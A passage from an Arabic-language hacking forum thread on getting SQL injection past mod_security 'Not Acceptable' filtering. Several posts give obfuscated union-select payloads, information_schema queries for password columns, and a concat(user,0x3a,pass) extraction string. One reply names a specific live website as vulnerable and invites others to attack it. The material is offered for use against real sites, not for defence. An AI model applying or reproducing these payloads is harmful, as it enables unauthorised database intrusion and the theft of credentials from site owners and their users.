bypass Not Acceptable بطريقه جديده

السلام عليكم ورحمة الله وبركاته …

بعض الاحيان تستهدف سيرفر

وتعصره عصر وتطلع ثغرة SQL وتحقن

وتطلع الاعمده … ولاكن عند استعلام union select

يظهر لك

Not Acceptable

طيب اليوم صادفني سيرفر ولقية له حل

نشوف

or4.php?id=8+union+select+1,2,3--

ممتاز راح يظهر لنا الفلتره [b]Not Acceptable

[/b]

or4.php?id=8+union+select+1,2,3--

/!select/+1,2,3

طيب راح يتخطى لك لان راح تقول الطريقه معروفه

لو تواصل الحقن راح يظهر لك [b]Not Acceptable

[/b]طيب الطريقه الجديده … !!

حقنه على انه الاصدار 4 …!!؟

راح يتخطى حلاوه ddd

سلام

Gr44tZ

i-hmx , Lagripe-dz , the injector , sec4ever , ZidOo , Fox hacker , sadhacker , sarbot511 , sa^Dev!l

تسم أخي علي الشرح الجميل :slight_smile:

مرسي حبيبي اورنج طريقة حلوة + تخطي الفلاترة فن :wink:

[b]الطريقة هذي هي وهي من اكتشاف قراصنة غزه …

+/**/+Union/!select/

مثل ما قلت يا اورنج …

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) 

مكان العامود المصاب

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037) 

بعد الحقنه تضيف هذي …

ما قصرت اورنج …[/b]

^^

طريقتي تحقنه على انه اصدار رابع

شرح خفيف وبسيط

تسلم يعسل

طيب كيف راح يكون شكل الحقنه …؟

x5.php?id=8/!*select*/+1,Concat(user,0x3a,pass),3/!*from*/+AnyThing--

…؟ ما فهمت وش قصدك لان الاصدار الرابع تخمين ابي شكل الحقنه

اورنج ليش تنسبها لنفسك ؟؟؟؟؟؟

تسلم ايدك عالشرح

اورنج اول شيء يعطيك العافية

لكن اظنك بالمصري (بتهزر )

eek

اتمنى مراجعة موضوعك من جديد

تحيـاتي ويا ريت تتقبل وجهة نظري

شكرا حبيبي

الطريقة قديمة شوية و انا استعملها ناجحة

تقبل مروري

شكرا على الردود المحفزه

هع

مشكور مشكور

يعطيكـ العـافية ياحج اورنج
بس بالنسبة اللي يقول ليه بينسبه لنفسه … ممكن الحج اورنج جربها ومشيت وهو مش بيعرف حقوقها لاي حد فـ دي ممكن تحصل كتير ويكون حد مكتشفها قبله :smiley:
لكن ما شاء الله احنا عندنا رجالة حافظة كل شي :stuck_out_tongue:

[b]

[b]Gr44tZ

i-hmx , Lagripe-dz , the injector , sec4ever , ZidOo , Fox hacker , sadhacker , sarbot511 , sa^Dev!l[/b]
[/b]
همسة ~
Greet’z > Not Gr44Tz
ZaIdOoH Not ZiDo :smiley:
:stuck_out_tongue:

بالفعل [b]نحنا عندنا رجالة حافظة كل شي :stuck_out_tongue:

عافاك الله وحفظك يا اورنج
[/b]

مشكور يا أورنج على الموضوع

بس بالنسبة اللي يقول ليه بينسبه لنفسه … ممكن الحج اورنج جربها ومشيت وهو مش بيعرف حقوقها لاي حد فـ دي ممكن تحصل كتير ويكون حد مكتشفها قبله :d

+1


همسة ~
greet’z > not gr44tz
zaidooh not zido :d
:stuck_out_tongue:

كل دى همسه يا زيد :))
امال لو بتسيحله هتكتب ايه

من زمان ومروف ها الطريقة فى تخطي رولوز المود سكورتي

وين الجديد فيها ؟

طيب هذا موقع مصاب
ومفعل المود سيكيورتي بالسيرفر
http://almasa-group.com/products.php?pro_id=43
خلونا نشوف التخطي كيف ؟؟
صراحةً ما قدرت يمكن لأن بس عمودين للموقع

ان شاء الله اشرح انت فاهمين غلط + في غلط

قديمه …
قراصنة غزه تخطو المشكله ونزلو حل تخطيها + الفور بدن + انترنت سيرفر ارور
مع تطبيق الاوامر واستعراض الجداول والاعمده
ونزلو الشرح بكل المواقع